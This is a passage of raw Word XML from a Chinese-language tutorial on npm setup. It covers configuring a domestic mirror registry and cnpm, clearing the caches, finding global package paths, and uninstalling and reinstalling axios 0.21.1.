          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE7EC6">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>npm config set registry=</w:t>
      </w:r>
      <w:hyperlink r:id="rId175" w:history="1">
        <w:r w:rsidRPr="00FE7EC6">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:color w:val="FF0000"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>https://registry.npmmirror.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7730B559" w14:textId="77777777" w:rsidR="00C67EAA" w:rsidRPr="00C67EAA" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FD1D17C" w14:textId="77777777" w:rsidR="00C67EAA" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="434DF5E6" w14:textId="77777777" w:rsidR="00C67EAA" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FED7AF2" w14:textId="77777777" w:rsidR="00C67EAA" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BB39D55" w14:textId="6EFDC5B1" w:rsidR="0017155E" w:rsidRDefault="0017155E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="670" w:name="_Toc159780100"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>国内镜像</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cnpm</w:t>
      </w:r>
      <w:r w:rsidR="00E31E1F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00E31E1F" w:rsidRPr="006032E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>强力推荐安装！很快！</w:t>
      </w:r>
      <w:r w:rsidR="006032E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>快一万倍！</w:t>
      </w:r>
      <w:r w:rsidR="00E31E1F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="670"/>
    </w:p>
    <w:p w14:paraId="315C423B" w14:textId="307D10CB" w:rsidR="0017155E" w:rsidRPr="00DC1DED" w:rsidRDefault="0017155E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0017155E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到目前为止，</w:t>
      </w:r>
      <w:r w:rsidRPr="0017155E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>node</w:t>
      </w:r>
      <w:r w:rsidRPr="0017155E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的环境已经安装完成，</w:t>
      </w:r>
      <w:r w:rsidRPr="0017155E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">npm </w:t>
      </w:r>
      <w:r w:rsidRPr="0017155E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包管理器也有了，由于有些</w:t>
      </w:r>
      <w:r w:rsidRPr="0017155E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:r w:rsidRPr="0017155E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>资源被屏蔽或者是国外资源的原因，经常会导致</w:t>
      </w:r>
      <w:r w:rsidRPr="0017155E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:r w:rsidRPr="0017155E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装依赖包的时候失败，所以我们还需要</w:t>
      </w:r>
      <w:r w:rsidRPr="0017155E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:r w:rsidRPr="0017155E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的国内镜像</w:t>
      </w:r>
      <w:r w:rsidRPr="0017155E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>----cnpm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E5F55B" w14:textId="7ECB9E03" w:rsidR="00DC1DED" w:rsidRDefault="0017155E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0017155E">
        <w:t>npm install -g cnpm --registry=http://registry.npm.taobao.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F028B16" w14:textId="77777777" w:rsidR="00DC1DED" w:rsidRDefault="00DC1DED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F9E9B77" w14:textId="77777777" w:rsidR="00DC1DED" w:rsidRDefault="00DC1DED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C305874" w14:textId="77777777" w:rsidR="005078A0" w:rsidRDefault="005078A0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45BE3926" w14:textId="77777777" w:rsidR="005078A0" w:rsidRDefault="005078A0" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="671" w:name="_Toc159780101"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看全局包路径</w:t>
      </w:r>
      <w:bookmarkEnd w:id="671"/>
    </w:p>
    <w:p w14:paraId="2DA34CEF" w14:textId="77777777" w:rsidR="005078A0" w:rsidRDefault="005078A0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CCB3667" w14:textId="77777777" w:rsidR="005078A0" w:rsidRDefault="005078A0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B16EEE">
        <w:t>npm root -g</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D90763" w14:textId="77777777" w:rsidR="00B16EEE" w:rsidRDefault="00B16EEE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23520A66" w14:textId="77777777" w:rsidR="00B16EEE" w:rsidRDefault="00B16EEE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="675A0B62" w14:textId="39419B3B" w:rsidR="00FA4EED" w:rsidRDefault="00FA4EED" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="672" w:name="_Toc159780102"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卸载包、安装包</w:t>
      </w:r>
      <w:bookmarkEnd w:id="672"/>
    </w:p>
    <w:p w14:paraId="60209EE4" w14:textId="77777777" w:rsidR="00FA4EED" w:rsidRDefault="00FA4EED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B8F94FD" w14:textId="228FBCA5" w:rsidR="004F0BCD" w:rsidRDefault="004F0BCD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有的教程说</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>axios</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本太高导致</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VUE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">04 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这里就卸载下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>axios</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的细节</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A62F4D" w14:textId="77777777" w:rsidR="004F0BCD" w:rsidRDefault="004F0BCD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B8F9457" w14:textId="6C50F7E5" w:rsidR="000E4B7B" w:rsidRDefault="00FB7CE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卸载包有点麻烦</w:t>
      </w:r>
      <w:r w:rsidR="000E4B7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，先清理</w:t>
      </w:r>
      <w:r w:rsidR="000E4B7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> npm</w:t>
      </w:r>
      <w:r w:rsidR="000E4B7B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000E4B7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="000E4B7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> cnpm </w:t>
      </w:r>
      <w:r w:rsidR="000E4B7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的缓存，不清缓存可能会导致</w:t>
      </w:r>
      <w:r w:rsidR="000E4B7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ERR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3238D675" w14:textId="4610D9F0" w:rsidR="00FB7CE8" w:rsidRPr="005939E8" w:rsidRDefault="00FB7CE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005939E8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="005939E8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pm cache clean –force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C724E54" w14:textId="406DC875" w:rsidR="00FB7CE8" w:rsidRDefault="00FB7CE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005939E8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="005939E8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="005939E8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">pm cache clean </w:t>
      </w:r>
      <w:r w:rsidR="000E4B7B" w:rsidRPr="005939E8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="005939E8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A50E6AF" w14:textId="59DE2C38" w:rsidR="000E4B7B" w:rsidRDefault="000E4B7B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后再执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">uninstall </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> remove</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（这两个命令等价）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来卸载。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D161E0" w14:textId="21F3EFB9" w:rsidR="000E4B7B" w:rsidRPr="00FB7CE8" w:rsidRDefault="000E4B7B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卸载时，需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启代理，用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卸载，稍微花点时间，联网十来分钟执行卸载命令才成功，如下。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24998EA9" w14:textId="5B56C8C6" w:rsidR="00FB7CE8" w:rsidRDefault="00FB7CE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B614500" wp14:editId="37F5C384">
            <wp:extent cx="5274310" cy="1214120"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="1691306222"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06222" name="图片 1" descr="图形用户界面&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId176"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1214120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6244FE" w14:textId="548C1BAE" w:rsidR="00FB7CE8" w:rsidRDefault="005939E8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>然后安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>axios</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359EE65F" w14:textId="45C7BC52" w:rsidR="00FA4EED" w:rsidRDefault="005939E8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005939E8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cnpm install axios@0.21.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AE1E95" w14:textId="77777777" w:rsidR="00FA4EED" w:rsidRDefault="00FA4EED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7555D08C" w14:textId="06721E68" w:rsidR="006443F8" w:rsidRDefault="006443F8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>axios</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的最新的版本</w:t>
      </w:r>
      <w:r w:rsidR="00785592">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00785592" w:rsidRPr="00785592">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>不是指你自己机器里的</w:t>
      </w:r>
      <w:r w:rsidR="00785592" w:rsidRPr="00785592">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>axios</w:t>
      </w:r>
      <w:r w:rsidR="00785592" w:rsidRPr="00785592">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的版本</w:t>
      </w:r>
      <w:r w:rsidR="00785592">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBC3502" w14:textId="4CAE98CF" w:rsidR="006443F8" w:rsidRDefault="006443F8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="006443F8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>npm view axios version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC77F1B" w14:textId="77777777" w:rsidR="006443F8" w:rsidRDefault="006443F8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="236472DF" w14:textId="0EF65F4B" w:rsidR="00043D10" w:rsidRDefault="00043D10" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看本地代码里的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的包的版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC51FD2" w14:textId="77777777" w:rsidR="00043D10" w:rsidRPr="00043D10" w:rsidRDefault="00043D10" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00043D10">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>npm list -g</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D666772" w14:textId="3B6285FE" w:rsidR="006443F8" w:rsidRPr="00043D10" w:rsidRDefault="00043D10" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00043D10">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>npm show -g axios version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FB3CC0" w14:textId="77777777" w:rsidR="00785592" w:rsidRDefault="00785592" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D058A8C" w14:textId="573EA7F5" w:rsidR="00785592" w:rsidRPr="002D34EA" w:rsidRDefault="00266782" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D34EA">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>全局清理</w:t>
      </w:r>
      <w:r w:rsidRPr="002D34EA">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>npm cache</w:t>
      </w:r>
      <w:r w:rsidRPr="002D34EA">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>（安装后啊，卸载后啊，前后都执行一下）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D2E009" w14:textId="37C4F5D1" w:rsidR="00266782" w:rsidRDefault="00266782" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002D34EA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>npm cache clean -g</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795C88CA" w14:textId="77777777" w:rsidR="00266782" w:rsidRDefault="00266782" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74F4EA2B" w14:textId="680CEEE9" w:rsidR="00266782" w:rsidRDefault="00266782" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>查看全局前缀路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A7CA9F" w14:textId="4955A69A" w:rsidR="00266782" w:rsidRDefault="00266782" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00266782">
        <w:t>npm prefix -g</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE23979" w14:textId="1D9A74FE" w:rsidR="00266782" w:rsidRDefault="005B7E24" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>直接进全局路径，看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lib  </w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">node_modules </w:t>
      </w:r>
      <w:r>
        <w:t>可以看全局包安装过啥东西</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9FF271" w14:textId="77777777" w:rsidR="005B7E24" w:rsidRDefault="005B7E24" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43019D3D" w14:textId="61CDE058" w:rsidR="00266782" w:rsidRDefault="005B7E24" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005B7E24">
        <w:t>npm config get prefix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C23E30B" w14:textId="690A5B94" w:rsidR="005B7E24" w:rsidRDefault="005B7E24" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>检查配置的</w:t>
      </w:r>
      <w:r>
        <w:t>npm</w:t>
      </w:r>
      <w:r>
        <w:t>的包路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FDDE87" w14:textId="77777777" w:rsidR="005B7E24" w:rsidRDefault="005B7E24" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64C908C1" w14:textId="77777777" w:rsidR="005B7E24" w:rsidRDefault="005B7E24" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35E48711" w14:textId="00FA0168" w:rsidR="005B7E24" w:rsidRDefault="005B7E24" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看全局包的版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791BDE31" w14:textId="0A645FFB" w:rsidR="00266782" w:rsidRDefault="005B7E24" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005B7E24">
        <w:t>npm show -g axios version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433F72FD" w14:textId="77777777" w:rsidR="00266782" w:rsidRDefault="00266782" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A093610" w14:textId="1F9E3F22" w:rsidR="002D34EA" w:rsidRDefault="002D34EA" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="673" w:name="_Toc159780103"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目卸载</w:t>
      </w:r>
      <w:bookmarkEnd w:id="673"/>
    </w:p>
    <w:p w14:paraId="41EBBA1F" w14:textId="77777777" w:rsidR="002D34EA" w:rsidRDefault="002D34EA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1998C506" w14:textId="2946CEBA" w:rsidR="002D34EA" w:rsidRDefault="003668F7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以直接删除项目下的</w:t>
      </w:r>
      <w:r w:rsidRPr="003668F7">
        <w:t>node_modules</w:t>
      </w:r>
      <w:r>
        <w:rPr>
